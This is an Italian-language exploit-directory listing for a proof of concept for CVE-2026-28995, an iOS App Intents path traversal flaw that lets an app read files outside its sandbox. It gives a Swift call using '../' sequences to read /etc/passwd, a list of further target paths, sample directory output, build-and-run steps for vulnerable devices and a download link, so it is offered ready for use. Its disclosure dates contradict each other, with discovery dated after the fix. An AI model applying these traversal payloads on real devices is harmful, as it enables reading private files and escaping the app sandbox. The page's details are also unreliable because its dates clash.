Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-28995 — # CVE-2026-28995 Prova di concetto per CVE-2026-28995 — Vulnerabilità di Path Traversal in App Intents su iOS 26.4.2 e versioni precedenti. | Kitploit
Strumenti/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
Sicurezza iOSAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza Mobile
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 Prova di concetto per CVE-2026-28995 — Vulnerabilità di Path Traversal in App Intents su iOS 26.4.2 e versioni precedenti.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
421 mese faNon ancora revisionato

CVE-2026-28995

Proof of Concept per CVE-2026-28995 — Vulnerabilità di Path Traversal in App Intents su iOS 26.4.2 e versioni precedenti.

Descrizione

Questa vulnerabilità permette a un'app dannosa di leggere qualsiasi file al di fuori della sua sandbox tramite App Intents. La causa principale è una validazione insufficiente dei percorsi nel framework App Intents di Apple.

Versioni affette: iOS 26.4.2 e inferiori
Corretto in: iOS 26.5 (11 maggio 2026)

Utilizzo

1. Funzione readCve(path: String) -> String

root@kitploit:~
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
  1. Esempi di Percorsi

Path Legge ../../../../../../../../../../../../../etc/passwd Password utente ../../../../../../../../../../../../../etc/hosts File hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Preferenze di sistema

  1. Gestione delle Directory

Se il percorso punta a una directory, la funzione restituisce:

root@kitploit:~
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/

Come Eseguire

  • Crea un progetto iOS in Xcode.
  • Aggiungi CVE-2026-28995.swift al progetto.
  • Chiama readCve(path:) con il percorso target.
  • Esegui su iOS 26.4.2 o precedente.

Divulgazione Responsabile

  • Scoperta: 1 luglio 2026
  • Corretto in: iOS 26.5 (11 maggio 2026)
Scarica lo strumento